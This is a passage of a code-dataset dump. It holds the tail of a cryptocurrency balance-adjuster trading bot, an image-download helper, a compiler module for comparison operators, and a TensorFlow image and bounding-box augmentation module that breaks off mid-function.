intermediate_coin_amount * pair2_price * (1 + fee2/100)\n elif intermediate_coin_amount > 0:\n buyback_order_side2 = 'sell'\n pair2_price = Decimal(str(order_book2[0][0]))\n target_coin_amount = intermediate_coin_amount * pair2_price * (1 - fee2/100)\n order_info = ((pair1, buyback_order_side1, buyback_order_amount1, pair1_price), (pair2, buyback_order_side2, buyback_order_amount2, pair2_price))\n return True, target_coin_amount, order_info\n\n \"\"\"\n Check for all coin adjuster if they can be buyback and still have profit \n \"\"\"\n def _adjuster_check(self):\n accumulate_amount_of_target_coin = Decimal(0)\n for coin_fee_pair, value in self._adjuster_coins_in_total.items():\n if coin_fee_pair[0] != self._target_coin:\n status, target_coin_buyback_amount, buyback_order_input = self._get_target_coin_amount_from_coin(coin_fee_pair)\n #self._log('{} {} {}'.format(coin_fee_pair[0], target_coin_buyback_amount, buyback_order_input))\n if not 
status:\n self._log('balance_adjuster_botmom---235Not status {}'.format(coin_fee_pair[0]), severity='error')\n return False\n # (coin, fee, pair): [start, end, adjuster_amount, order_info_adjuster]\n self._adjuster_coins_in_total[coin_fee_pair][-1] = buyback_order_input\n accumulate_amount_of_target_coin += target_coin_buyback_amount\n else:\n accumulate_amount_of_target_coin += value[2]\n self._socketdata.update({'TOTAL_MARGIN': float(accumulate_amount_of_target_coin)})\n log('Total margin in target coin: {}'.format(float(accumulate_amount_of_target_coin)), console=False)\n if accumulate_amount_of_target_coin > self._threshold:\n return True\n return False\n\n def _cancel_opening_orders_then_buyback(self):\n coin_list = [k[0] for k in self._adjuster_coins_in_total.keys()]\n for ex_obj in self._exchanges.values():\n ex_obj.cancel_all_open_orders(coin_list)\n for coin_fee_pair, value in self._adjuster_coins_in_total.items():\n if coin_fee_pair[0] == self._target_coin:\n continue\n # (coin, fee, pair): [start, end, adjuster_amount, order_info_adjuster]\n if value[-2] != 0:\n # Direct pair\n if coin_fee_pair[-1]:\n pair, side, amount, price = value[-1]\n ex = pair[:3]\n pair = pair[3:]\n self._exchanges.get(ex).create_order(pair, 'limit', side, float(amount), float(price))\n # TODO later Indirect pair, must have intermediate\n else:\n for order_info in coin_fee_pair[-1]:\n pair, side, amount, price = order_info\n ex = pair[:3]\n pair = pair[3:]\n self._exchanges.get(ex).create_order(pair, 'limit', side, float(amount), float(price))\n\n\n def _balances_snapshot(self, at):\n if at == 'start': \n position = 0\n elif at == 'end':\n position = 1\n\n # Reset total counter before update\n for _, couters in self._adjuster_coins_in_total.items():\n couters[position] = 0\n\n for ex, coin_info in self._adjuster_coins.items():\n cur_balances = self._exchanges.get(ex).fetch_balance()\n # self._adjuster_coins_in_total: {(coin, fee, pair): [start, end, adjuster_amount, order_info_adjuster]}\n #self._log('coin_info {}'.format(coin_info))\n for coin, _ in coin_info.items():\n if not cur_balances:\n continue\n if not cur_balances.get(coin):\n continue\n cur_balance = Decimal(str(cur_balances.get(coin).get('total')))\n self._adjuster_coins[ex][coin][position] = cur_balance\n if at == 'end':\n start_balance = self._adjuster_coins[ex][coin][0]\n self._adjuster_coins[ex][coin][2] = cur_balance - start_balance\n\n coin_fee_pair = ()\n for item in self._adjuster_coins_in_total.keys():\n if coin == item[0]:\n coin_fee_pair = item\n break\n\n exist_amount = self._adjuster_coins_in_total.get(coin_fee_pair)[position]\n new_amount = exist_amount + cur_balance\n self._adjuster_coins_in_total[coin_fee_pair][position] = new_amount\n if at == 'end':\n for coin_fee_pair in self._adjuster_coins_in_total.keys():\n start_total_balance = self._adjuster_coins_in_total[coin_fee_pair][0]\n cur_total_balance = self._adjuster_coins_in_total[coin_fee_pair][1]\n self._adjuster_coins_in_total[coin_fee_pair][2] = cur_total_balance - start_total_balance\n\n self._socketdata = {}\n adjuster_coins_data = self._adjuster_coins.copy()\n for ex, coin_info in adjuster_coins_data.items():\n coin_dict = {}\n for coin, values in coin_info.items():\n coin_dict.update({coin: [float(e) if isinstance(e, Decimal) else e for e in values]})\n self._socketdata.update({ex: coin_dict})\n self._socketdata.update({'TOTAL': []})\n self._socketdata.update({'TOTAL_MARGIN': 0})\n\n print_out = 'EXCHAGES INFO\\n'\n for ex, coin_info_list in 
self._adjuster_coins.items():\n print_out += '{}\\n'.format(ex)\n for k, v in coin_info_list.items():\n print_out += '\\t{}\\t{}\\n'.format(k, [float(e) if isinstance(e, Decimal) else e for e in v])\n log(print_out, console=False)\n print_out = '\\nTOTAL INFO\\n'\n for k, v in self._adjuster_coins_in_total.items():\n value = [float(e) if isinstance(e, Decimal) else e for e in v[:-1]]\n self._socketdata['TOTAL'].append({k[0]: value})\n print_out += '\\t{}\\t{}\\n'.format(k[0], value)\n log(\"{}+++++++Balance checking at {} interval++++++++++\".format(print_out, at), console=False)\n\n\n def _find_pair_in_exchange(self, coin1, coin2):\n pair = None\n # Exception case for 'USD' on KRA\n if coin1 == 'USD' or coin2 == 'USD':\n exchange_id = 'KRA'\n else:\n exchange_id = self._buyback_exchange\n market_pairs = [i.get('symbol') for i in self._exchanges.get(exchange_id).api.fetch_markets()]\n pair1 = \"{}/{}\".format(coin1, coin2)\n pair2 = \"{}/{}\".format(coin2, coin1)\n if pair1 in market_pairs:\n pair = pair1\n elif pair2 in market_pairs:\n pair = pair2\n # ee.g. KRAUSDT/USD or BINBTC/USDT\n return exchange_id + pair\n\n def bot_entry(self, web_inputs=None):\n socketio = None\n channel_uuid = ''\n if web_inputs:\n self._socketio = web_inputs.get('socketio')\n socketio = self._socketio\n self._channel_uuid = web_inputs.get('uuid')\n channel_uuid = self._channel_uuid\n self._logger = logging.getLogger(channel_uuid)\n\n self._args = arg_parser(web_inputs)\n self._target_coin = self._args.get('target_coin')\n self._buyback_exchange = self._args.get('buyback_exchange')\n self._buyback = self._args.get('buyback')\n self._threshold = self._args.get('threshold')\n checking_interval = self._args.get('checking_interval')\n ex_and_coin_fee_dict = self._args.get('ex_and_coin_fee')\n\n # Config logger\n self._config_logger()\n\n self._log('START THE BALANCE_ADJUSTER_BOT, INITIALIZING...')\n timer_thread = None\n for exchange_id in ex_and_coin_fee_dict:\n api_file_no = 0\n ex_id = exchange_id\n api_name = ''\n if re.match(r\"^.*\\d$\", ex_id):\n api_file_no = ex_id[-1]\n if ex_id[:-1] == 'BI':\n ex_id = 'BIN'\n elif ex_id[:-1] == 'KR':\n ex_id = 'KRA'\n if '1' == str(api_file_no):\n api_name = self._args.get('account_sell_buy')\n elif '2' == str(api_file_no):\n api_name = self._args.get('account_buy_sell')\n\n exchange_obj = exchange(ex_id, api_name=api_name, own_username=self._args.get('own_username'), api_from_file=api_file_no)\n self._exchanges.update({exchange_id: exchange_obj})\n\n # Initial adjuster list of coins, each item has format: exchang_id: {coin: [start, end, adjuster_amount]}\n # self._adjuster_coins_in_total: {(coin, fee, pair): [start, end, adjuster_amount, order_info_adjuster]}\n for ex, coin_fee_list in ex_and_coin_fee_dict.items():\n self._adjuster_coins.update({ex: {}})\n for coin, fee in coin_fee_list:\n if coin == self._target_coin:\n self._adjuster_coins[ex].update({coin: [Decimal(0), Decimal(0), Decimal(0)]})\n self._adjuster_coins_in_total.update({(coin, fee, None): [Decimal(0), Decimal(0), Decimal(0), ()]})\n continue\n pair = self._find_pair_in_exchange(self._target_coin, coin)\n if pair:\n if coin == 'USD':\n exchange_id = 'KRA'\n else:\n exchange_id = pair[:3]\n self._exchanges.get(exchange_id).register_order_book(pair[3:])\n self._adjuster_coins[ex].update({coin: [Decimal(0), Decimal(0), Decimal(0)]})\n if coin not in [i[0] for i in self._adjuster_coins_in_total.keys()]:\n self._adjuster_coins_in_total.update({(coin, fee, pair): [Decimal(0), Decimal(0), Decimal(0), ()]})\n 
else:\n # TODO later. There is no direct pair for the coin and target coin, it must have intermediate coin\n info = coin[1][1:-1].split('+')\n intermediate_coin = info[0]\n pair1 = self._find_pair_in_exchange(intermediate_coin, coin[0])\n pair2 = self._find_pair_in_exchange(intermediate_coin, self._target_coin)\n if not pair1 or not pair2:\n self._log(\"balance_adjuster_botmom---420Couldn't find pair for {} {} {}\".format(intermediate_coin, coin[0], self._target_coin), severity='error')\n self._exchanges.get(ex).register_order_book(pair1)\n self._exchanges.get(ex).register_order_book(pair2)\n fees = ((pair1, info[1]), (pair2, info[2]))\n self._adjuster_coins[ex].update({(coin[0], fees, None): [Decimal(0), Decimal(0), Decimal(0)]})\n\n # Take START balances snapshot\n self._balances_snapshot(at='start')\n socket_emit(self._socketdata, self._socketio, self._channel_uuid, 'log_one_way_balance')\n while not self._terminate:\n time.sleep(checking_interval * 60)\n # Take END balances snapshot\n self._balances_snapshot(at='end')\n check_flag = self._adjuster_check()\n socket_emit(self._socketdata, self._socketio, self._channel_uuid, 'log_one_way_balance')\n if check_flag and self._buyback:\n self._log('balance_adjuster_botmom---436**************SIGNAL, ADJUSTING BALANCE ...')\n self._cancel_opening_orders_then_buyback()\n log(\"-------------------------------------------------------------------------------------------------------------\", console=False)\n\n # end while\n if timer_thread:\n timer_thread.join()\n self._log(\"balance_adjuster_botmom---443BALANCE_ADJUSTER_BOT EXIT!\")\n # end bot_entry mothod\n# end balance_adjuster_bot class\n\n\nif __name__ == \"__main__\":\n a_bot = balance_adjuster_bot()\n a_bot.bot_entry()\n os._exit(0)\n","repo_name":"codepritesh/saastoolfeb","sub_path":"bots/balance_adjuster_bot.py","file_name":"balance_adjuster_bot.py","file_ext":"py","file_size_in_byte":21843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
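The conversion logic in _get_target_coin_amount_from_coin above prices a balance delta into the target coin and pads it by the order fee, using the ask for buybacks and the bid for sell-offs. A simplified standalone sketch of the base-coin case (function name and numbers are illustrative only, not part of the bot):

from decimal import Decimal

def target_amount_for_base_coin(delta, best_bid, best_ask, fee_pct):
    """Convert a base-coin balance delta into the quote (target) coin,
    mirroring the sign handling in _get_target_coin_amount_from_coin:
    a negative delta must be bought back at the ask (cost inflated by the fee),
    a positive delta can be sold at the bid (proceeds reduced by the fee)."""
    if delta < 0:
        return delta * best_ask * (1 + fee_pct / 100)
    return delta * best_bid * (1 - fee_pct / 100)

# Illustrative numbers only:
print(target_amount_for_base_coin(Decimal("-0.5"), Decimal("100"), Decimal("101"), Decimal("0.1")))
# -> about -50.55 target units are needed to buy the 0.5 back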
+{"seq_id":"21075289395","text":"# -*- coding: utf-8 -*-\n# -*- mode: python -*-\nimport os\n\ndef get_img(net, url):\n img = net.req(url)\n return img\n\ndef save_img(fobj, fpath, tmppath='temp'):\n ipath = os.path.join(tmppath, fpath)\n ipath = ipath.rstrip('/')\n if not os.path.isfile(ipath):\n dpath = os.path.dirname(ipath)\n if not os.path.isdir(dpath):\n os.makedirs(dpath)\n with open(ipath, 'wb') as f:\n f.write(fobj)\n return ipath\n\ndef download_img(net, url, tmppath='temp'):\n img = get_img(net, url)\n return save_img(img, url.partition('://')[2], tmppath)\n","repo_name":"waipu/bakawipe","sub_path":"lib/ocr/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"31598071555","text":"from smartanthill_zc import node, expression\nfrom smartanthill_zc.lookup import RootScope\nfrom smartanthill_zc.node import ParameterListNode, Node, ResolutionHelper\n\n\nclass OperatorDeclNode(Node, ResolutionHelper):\n\n '''\n Node class to represent an operator declaration\n '''\n\n def __init__(self, operator, type_name):\n '''\n Constructor\n '''\n super(OperatorDeclNode, self).__init__()\n self.child_parameter_list = None\n self.txt_operator = operator\n self.txt_type_name = type_name\n\n def set_parameter_list(self, child):\n '''\n parameter_list setter\n '''\n assert isinstance(child, ParameterListNode)\n child.set_parent(self)\n self.child_parameter_list = child\n\n def do_resolve_declaration(self, compiler):\n '''\n Template method from ResolutionHelper\n '''\n compiler.resolve_node(self.child_parameter_list)\n\n scope = self.get_scope(RootScope)\n scope.add_operator(compiler, self.txt_operator, self)\n\n return scope.lookup_type(self.txt_type_name)\n\n def static_evaluate(self, compiler, expr, arg_list):\n '''\n Do static evaluation of expressions when possible\n '''\n # pylint: disable=no-self-use\n # pylint: disable=unused-argument\n return None\n\n_negate_comparison_map = {'==': '!=',\n '!=': '==',\n '<': '>=',\n '>': '<=',\n '<=': '>',\n '>=': '<'}\n\n\ndef negate_comparison(txt_op, negate):\n '''\n If negate is False, returns the same txt_op,\n If negate is True, return the negated comparison operator\n '''\n\n if negate:\n return _negate_comparison_map[txt_op]\n else:\n return txt_op\n\n\n_negate_logic_map = {'!': '!',\n '&&': '||',\n '||': '&&'}\n\n\ndef negate_logic(txt_op, negate):\n '''\n If negate is False, returns the same txt_op,\n If negate is True, return the negated logic operator\n '''\n\n if negate:\n return _negate_logic_map[txt_op]\n else:\n return txt_op\n\n\n_swap_comparison_map = {'==': '==',\n '!=': '!=',\n '<': '>',\n '>': '<',\n '<=': '>=',\n '>=': '<='}\n\n\ndef swap_comparison(txt_op, swap):\n '''\n If swap is False, returns the same txt_op,\n If swap is True, return the comparison operator needed to swap lhs y rhs\n '''\n\n if swap:\n return _swap_comparison_map[txt_op]\n else:\n return txt_op\n\n\ndef simplify_comparison(txt_op, value, value_type):\n\n if txt_op in ['==', '!=']: # TODO really want to support == and != ?\n return (txt_op, value)\n elif txt_op == '<':\n return ('<', value_type.round_up(value))\n elif txt_op == '>':\n return ('>', value_type.round_down(value))\n elif txt_op == '<=':\n return ('<', value_type.next_up(value))\n elif txt_op == '>=':\n return ('>', value_type.next_down(value))\n else:\n assert False\n\n\ndef create_number_to_literal_comparison(compiler, ctx, root, operator_list):\n\n for current in operator_list:\n op = compiler.init_node(\n NumberToLiteralCompDeclNode(current, '_zc_boolean'), ctx)\n op.set_parameter_list(\n node.create_parameter_list(compiler, ctx,\n ['_zc_number', '_zc_number_literal']))\n root.add_declaration(op)\n\n op2 = compiler.init_node(\n NumberToLiteralCompDeclNode(current, '_zc_boolean'), ctx)\n op2.set_parameter_list(\n node.create_parameter_list(compiler, ctx,\n ['_zc_number_literal', '_zc_number']))\n op2.swap_flag = True\n root.add_declaration(op2)\n\n\nclass NumberToLiteralCompDeclNode(OperatorDeclNode):\n\n '''\n Node class to represent an special operator declaration\n for comparison between number and number literal\n This comparison is special because it is translated into specific\n ZEPTOVM_OP_JMPIFEXPR_XX operations\n '''\n\n def __init__(self, 
operator, type_name):\n '''\n Constructor\n '''\n super(NumberToLiteralCompDeclNode, self).__init__(\n operator, type_name)\n self.swap_flag = False\n\n def static_evaluate(self, compiler, expr, arg_list):\n '''\n Do replace generic ComparisonOpExprNode by a much more specific\n NumberToLiteralCompExprNode\n '''\n\n assert isinstance(expr, expression.ComparisonOpExprNode)\n assert len(expr.child_argument_list.childs_arguments) == 2\n\n result = compiler.init_node(NumberToLiteralCompExprNode(), expr.ctx)\n result.set_argument_list(expr.child_argument_list)\n result.ref_decl = self\n\n compiler.remove_node(expr)\n\n result.set_type(self.get_type())\n\n return result\n\n\nclass NumberToLiteralCompExprNode(node.ExpressionNode):\n\n '''\n Node class representing an special operator comparison expression\n between a number and a number literal.\n This kind of expression is created from a regular ComparisonOpExprNode\n by NumberToLiteralCompDeclNode for all expressions that match\n This allows easier detection of this special comparison at a later time\n '''\n\n def __init__(self):\n '''\n Constructor\n '''\n super(NumberToLiteralCompExprNode, self).__init__()\n self.child_argument_list = None\n self.ref_decl = None\n\n def set_argument_list(self, child):\n '''\n argument_list setter\n '''\n assert isinstance(child, node.ArgumentListNode)\n child.set_parent(self)\n self.child_argument_list = child\n\n def get_expression(self):\n assert len(self.child_argument_list.childs_arguments) == 2\n\n i = 0 if not self.ref_decl.swap_flag else 1\n return self.child_argument_list.childs_arguments[i]\n\n def get_literal(self):\n assert len(self.child_argument_list.childs_arguments) == 2\n\n i = 1 if not self.ref_decl.swap_flag else 0\n return self.child_argument_list.childs_arguments[i]\n\n def get_subcode_and_threshold(self, negate):\n '''\n simplify >= and <= to < and > by modifying literal value by epsilon\n Also apply an optional negation flag, as helper for code generator,\n since normally if body is executed when condition is true,\n but at implementation, body is jumped when condition is false\n '''\n\n op = swap_comparison(\n self.ref_decl.txt_operator, self.ref_decl.swap_flag)\n\n op = negate_comparison(op, negate)\n\n threshold = self.get_literal().get_static_value()\n assert threshold\n ltype = self.get_expression().get_type()\n\n return simplify_comparison(op, threshold, ltype)\n\n\ndef create_number_to_number_comparison(compiler, ctx, root, operator_list):\n\n for current in operator_list:\n op = compiler.init_node(\n NumberToNumberCompDeclNode(current, '_zc_boolean'), ctx)\n op.set_parameter_list(node.create_parameter_list(compiler, ctx,\n ['_zc_number',\n '_zc_number']))\n root.add_declaration(op)\n\n\nclass NumberToNumberCompDeclNode(OperatorDeclNode):\n\n '''\n Node class to represent an special operator declaration\n for comparison between number and number literal\n This comparison is special because it is translated into specific\n ZEPTOVM_OP_JMPIFEXPR_XX operations\n '''\n\n def __init__(self, operator, type_name):\n '''\n Constructor\n '''\n super(NumberToNumberCompDeclNode, self).__init__(\n operator, type_name)\n\n def static_evaluate(self, compiler, expr, arg_list):\n '''\n Do replace generic ComparisonOpExprNode by a much more specific\n NumberToLiteralCompExprNode\n '''\n\n assert isinstance(expr, expression.ComparisonOpExprNode)\n assert len(expr.child_argument_list.childs_arguments) == 2\n\n result = compiler.init_node(NumberToNumberCompExprNode(), expr.ctx)\n 
result.set_argument_list(expr.child_argument_list)\n result.ref_decl = self\n\n compiler.remove_node(expr)\n\n result.set_type(self.get_type())\n\n return result\n\n\nclass NumberToNumberCompExprNode(node.ExpressionNode):\n\n '''\n Node class representing an special operator comparison expression\n between a number and a number literal.\n This kind of expression is created from a regular ComparisonOpExprNode\n by NumberToLiteralCompDeclNode for all expressions that match\n This allows easier detection of this special comparison at a later time\n '''\n\n def __init__(self):\n '''\n Constructor\n '''\n super(NumberToNumberCompExprNode, self).__init__()\n self.child_argument_list = None\n self.ref_decl = None\n\n def set_argument_list(self, child):\n '''\n argument_list setter\n '''\n assert isinstance(child, node.ArgumentListNode)\n child.set_parent(self)\n self.child_argument_list = child\n\n def get_subcode_and_threshold(self, negate):\n '''\n simplify >= and <= to < and > by modifying literal value by epsilon\n Also apply an optional negation flag, as helper for code generator,\n since normally if body is executed when condition is true,\n but at implementation, body is jumped when condition is false\n '''\n op = negate_comparison(self.ref_decl.txt_operator, negate)\n\n ltype = self.child_argument_list.childs_arguments[0].get_type()\n\n return simplify_comparison(op, 0.0, ltype)\n","repo_name":"smartanthill/zepto-compiler","sub_path":"smartanthill_zc/comparison.py","file_name":"comparison.py","file_ext":"py","file_size_in_byte":9828,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
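To make the threshold nudging in simplify_comparison concrete: '<=' and '>=' are rewritten as strict comparisons against a value moved one step by the operand's type. A self-contained sketch with a stand-in integer-like type (the real value_type comes from the compiler's type lookup):

class IntLikeType:
    """Stand-in for the compiler's numeric type; real types supply these hooks."""
    def next_up(self, v):
        return v + 1
    def next_down(self, v):
        return v - 1
    def round_up(self, v):
        return v
    def round_down(self, v):
        return v

def simplify(txt_op, value, value_type):
    # Same mapping as simplify_comparison(): '<=' and '>=' become strict
    # comparisons against a nudged threshold; '<' and '>' only get rounded.
    if txt_op in ('==', '!='):
        return (txt_op, value)
    if txt_op == '<':
        return ('<', value_type.round_up(value))
    if txt_op == '>':
        return ('>', value_type.round_down(value))
    if txt_op == '<=':
        return ('<', value_type.next_up(value))
    if txt_op == '>=':
        return ('>', value_type.next_down(value))

print(simplify('<=', 5, IntLikeType()))  # ('<', 6): "x <= 5" becomes "x < 6"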
+{"seq_id":"39598675121","text":"import config\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow.keras as keras\nimport tensorflow_datasets as tfds\nfrom utils.util_graph import shrink_and_normalize_boxes, create_reg_positive_sample\n\n_image_size = [512, 640, 768, 896, 1024, 1280, 1408]\n_STRIDES = [8, 16, 32, 64, 128]\n_ALPHA = 0.0\n\n\n@tf.function\ndef _normalization_image(image, mode):\n if mode == 'ResNetV1':\n # Caffe\n image = image[..., ::-1] # RGB -> BGR\n image -= [103.939, 116.779, 123.68]\n\n elif mode == 'ResNetV2':\n image /= 127.5\n image -= 1.\n\n elif mode == 'EffNet':\n image = image\n\n elif mode in ['DenseNet', 'SEResNet']:\n # Torch\n image /= 255.\n image -= [0.485, 0.456, 0.406]\n image /= [0.229, 0.224, 0.225]\n\n return image\n\n\ndef _fmap_shapes(phi: int = 0, level: int = 5):\n _img_size = int(phi * 128) + 512\n _strides = [int(2 ** (x + 3)) for x in range(level)]\n\n shapes = []\n\n for i in range(level):\n fmap_shape = _img_size // _strides[i]\n shapes.append([fmap_shape, fmap_shape])\n\n return shapes\n\n\n@tf.function\ndef random_flip_horizontal(image, image_shape, bboxes, prob=0.5):\n \"\"\"Flips image and boxes horizontally\n\n Arguments:\n image: A 3-D tensor of shape `(height, width, channels)` representing an\n image.\n image_shape:\n bboxes: A tensor with shape `(num_boxes, 4)` representing bounding boxes,\n having normalized coordinates.\n prob: Chance.\n\n Returns:\n Randomly flipped image and boxes\n \"\"\"\n\n if tf.random.uniform(()) > (1 - prob):\n image = tf.image.flip_left_right(image)\n bboxes = tf.stack(\n [\n image_shape[1] - bboxes[..., 2] - 1,\n bboxes[..., 1],\n image_shape[1] - bboxes[..., 0] - 1,\n bboxes[..., 3]\n ],\n axis=-1\n )\n return image, bboxes\n\n\n@tf.function\ndef random_rotate(image, image_shape, bboxes, prob=0.5):\n offset = image_shape / 2.\n rotate_k = tf.random.uniform((), minval=1, maxval=4, dtype=tf.int32)\n\n def _r_method(x, y, angle):\n tf_cos = tf.math.cos(angle)\n tf_sin = tf.math.sin(angle)\n\n tf_abs_cos = tf.abs(tf_cos)\n tf_abs_sin = tf.abs(tf_sin)\n\n offset_h, offset_w = offset[0], offset[1]\n\n new_offset_w = offset_w * (tf_abs_cos - tf_cos) + offset_h * (tf_abs_sin - tf_sin)\n new_offset_h = offset_w * (tf_abs_sin + tf_sin) + offset_h * (tf_abs_cos - tf_cos)\n\n x_r = x * tf_cos + y * tf_sin + new_offset_w\n y_r = x * tf_sin * -1 + y * tf_cos + new_offset_h\n\n x_r = tf.round(x_r)\n y_r = tf.round(y_r)\n return x_r, y_r\n\n def _rotate_bbox(bbox):\n # degree: pi/2, pi, 3*pi/2\n angle = tf.cast(rotate_k, dtype=tf.float32) * (np.pi / 2.)\n\n x1, y1, x2, y2 = bbox[0], bbox[1], bbox[2], bbox[3]\n\n x1_n, y1_n = _r_method(x1, y1, angle)\n x2_n, y2_n = _r_method(x2, y2, angle)\n\n bbox = tf.stack([\n tf.minimum(x1_n, x2_n),\n tf.minimum(y1_n, y2_n),\n tf.maximum(x1_n, x2_n),\n tf.maximum(y1_n, y2_n)\n ])\n return bbox\n\n if tf.random.uniform(()) > (1 - prob):\n image = tf.image.rot90(image, k=rotate_k)\n\n bboxes = tf.map_fn(\n _rotate_bbox,\n elems=bboxes,\n fn_output_signature=tf.float32\n )\n image_shape = tf.cast(tf.shape(image)[:2], tf.float32)\n bboxes = tf.stack(\n [\n tf.clip_by_value(bboxes[:, 0], 0., image_shape[1] - 2), # x1\n tf.clip_by_value(bboxes[:, 1], 0., image_shape[0] - 2), # y1\n tf.clip_by_value(bboxes[:, 2], 1., image_shape[1] - 1), # x2\n tf.clip_by_value(bboxes[:, 3], 1., image_shape[0] - 1), # y2\n bboxes[:, -1]\n ],\n axis=-1\n )\n return image, image_shape, bboxes\n\n\n@tf.function\ndef multi_scale(image, image_shape, bboxes, prob=0.5):\n new_image_shape = 
image_shape\n\n if tf.random.uniform(()) > (1 - prob):\n # start, end, step = 0.25, 1.3, 0.05\n # scale = np.random.choice(np.arange(start, end, step))\n scale = tf.random.uniform((), minval=0.8, maxval=1.3)\n\n new_image_shape = tf.round(image_shape * scale)\n image = tf.image.resize(\n image,\n tf.cast(new_image_shape, tf.int32),\n method=tf.image.ResizeMethod.BILINEAR\n )\n bboxes = tf.stack(\n [\n tf.clip_by_value(bboxes[..., 0] * scale, 0, new_image_shape[1] - 2),\n tf.clip_by_value(bboxes[..., 1] * scale, 0, new_image_shape[0] - 2),\n tf.clip_by_value(bboxes[..., 2] * scale, 1, new_image_shape[1] - 1),\n tf.clip_by_value(bboxes[..., 3] * scale, 1, new_image_shape[0] - 1),\n ],\n axis=-1\n )\n bboxes = tf.round(bboxes)\n return image, new_image_shape, bboxes\n\n\n@tf.function\ndef random_crop(image, image_shape, bboxes, prob=0.5):\n if tf.random.uniform(()) > (1 - prob):\n min_x1y1 = tf.cast(tf.math.reduce_min(bboxes, axis=0)[:2], tf.int32)\n max_x2y2 = tf.cast(tf.math.reduce_max(bboxes, axis=0)[2:], tf.int32)\n new_image_shape = tf.cast(image_shape, tf.int32)\n\n random_x1 = tf.random.uniform((), minval=0, maxval=tf.maximum(min_x1y1[0] // 2, 1), dtype=tf.int32)\n random_y1 = tf.random.uniform((), minval=0, maxval=tf.maximum(min_x1y1[1] // 2, 1), dtype=tf.int32)\n\n random_x2 = tf.random.uniform(\n (),\n minval=max_x2y2[0] + 1,\n maxval=tf.math.maximum(\n tf.math.minimum(new_image_shape[1], max_x2y2[0] + (new_image_shape[1] - max_x2y2[0]) // 2),\n max_x2y2[0] + 2\n ),\n dtype=tf.int32\n )\n random_y2 = tf.random.uniform(\n (),\n minval=max_x2y2[1] + 1,\n maxval=tf.math.maximum(\n tf.math.minimum(new_image_shape[0], max_x2y2[1] + (new_image_shape[0] - max_x2y2[1]) // 2),\n max_x2y2[1] + 2\n ),\n dtype=tf.int32\n )\n\n image = tf.image.crop_to_bounding_box(\n image,\n offset_height=random_y1,\n offset_width=random_x1,\n target_height=(random_y2 - random_y1),\n target_width=(random_x2 - random_x1)\n )\n\n bboxes = tf.stack(\n [\n bboxes[:, 0] - tf.cast(random_x1, tf.float32),\n bboxes[:, 1] - tf.cast(random_y1, tf.float32),\n bboxes[:, 2] - tf.cast(random_x1, tf.float32),\n bboxes[:, 3] - tf.cast(random_y1, tf.float32),\n ],\n axis=-1\n )\n image_shape = tf.cast(tf.shape(image)[:2], tf.float32)\n\n return image, image_shape, bboxes\n\n\ndef random_image_saturation(image, prob=.5):\n if tf.random.uniform(()) > (1 - prob):\n image = tf.image.random_saturation(image, 1, 5)\n\n return image\n\n\ndef random_image_brightness(image, prob=.5):\n if tf.random.uniform(()) > (1 - prob):\n image = tf.image.random_brightness(image, 0.8, 1.)\n\n return image\n\n\ndef random_image_contrast(image, prob=.5):\n if tf.random.uniform(()) > (1 - prob):\n image = tf.image.random_contrast(image, 0.2, 1.)\n\n return image\n\n\n@tf.function\ndef image_color_augmentation(image):\n ids = int(tf.random.uniform((), minval=0, maxval=3))\n\n if ids == 0:\n image = random_image_saturation(image)\n\n elif ids == 1:\n image = random_image_brightness(image)\n\n elif ids == 2:\n image = random_image_contrast(image)\n\n return image\n\n\n@tf.function\ndef _image_transform(image, target_size=512, padding_value=.0):\n image_height, image_width = tf.shape(image)[0], tf.shape(image)[1]\n\n if image_height > image_width:\n scale = tf.cast((target_size / image_height), dtype=tf.float32)\n resized_height = target_size\n resized_width = tf.cast((tf.cast(image_width, dtype=tf.float32) * scale), dtype=tf.int32)\n else:\n scale = tf.cast((target_size / image_width), dtype=tf.float32)\n resized_height = tf.cast((tf.cast(image_height, 
dtype=tf.float32) * scale), dtype=tf.int32)\n resized_width = target_size\n\n image = tf.image.resize(\n image,\n (resized_height, resized_width),\n method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)\n\n offset_h = (target_size - resized_height) // 2\n offset_w = (target_size - resized_width) // 2\n\n # (h, w, c)\n pad = tf.stack(\n [\n tf.stack([offset_h, target_size - resized_height - offset_h], axis=0),\n tf.stack([offset_w, target_size - resized_width - offset_w], axis=0),\n tf.constant([0, 0]),\n ],\n axis=0\n )\n\n image = tf.pad(image, pad, constant_values=padding_value)\n\n return image, scale, [offset_h, offset_w]\n\n\n@tf.function\ndef _bboxes_transform(bboxes, classes, scale, offset_hw, max_bboxes=20, padding=False):\n bboxes *= scale\n bboxes = tf.stack(\n [\n (bboxes[:, 0] + tf.cast(offset_hw[1], dtype=tf.float32)),\n (bboxes[:, 1] + tf.cast(offset_hw[0], dtype=tf.float32)),\n (bboxes[:, 2] + tf.cast(offset_hw[1], dtype=tf.float32)),\n (bboxes[:, 3] + tf.cast(offset_hw[0], dtype=tf.float32)),\n classes\n ],\n axis=-1,\n )\n\n if padding:\n # true_label_count\n bboxes_count = tf.shape(bboxes)[0]\n max_bbox_pad = tf.stack(\n [\n tf.stack([tf.constant(0), max_bboxes - bboxes_count], axis=0),\n tf.constant([0, 0]),\n ],\n axis=0\n )\n bboxes = tf.pad(bboxes, max_bbox_pad, constant_values=0.)\n\n else:\n bboxes_count = tf.shape(bboxes)[0]\n\n return bboxes, bboxes_count\n\n\n@tf.function\ndef _clip_transformed_bboxes(image, bboxes, debug=False):\n image_shape = tf.cast(tf.shape(image)[:2], dtype=tf.float32)\n\n if debug:\n bboxes = tf.stack(\n [\n tf.clip_by_value(bboxes[:, 0] / image_shape[1], 0., 1.), # x1\n tf.clip_by_value(bboxes[:, 1] / image_shape[0], 0., 1.), # y1\n tf.clip_by_value(bboxes[:, 2] / image_shape[1], 0., 1.), # x2\n tf.clip_by_value(bboxes[:, 3] / image_shape[0], 0., 1.), # y2\n bboxes[:, -1]\n ],\n axis=-1\n )\n\n else:\n bboxes = tf.stack(\n [\n tf.clip_by_value(bboxes[:, 0], 0., image_shape[1] - 2), # x1\n tf.clip_by_value(bboxes[:, 1], 0., image_shape[0] - 2), # y1\n tf.clip_by_value(bboxes[:, 2], 1., image_shape[1] - 1), # x2\n tf.clip_by_value(bboxes[:, 3], 1., image_shape[0] - 1), # y2\n bboxes[:, -1]\n ],\n axis=-1\n )\n return 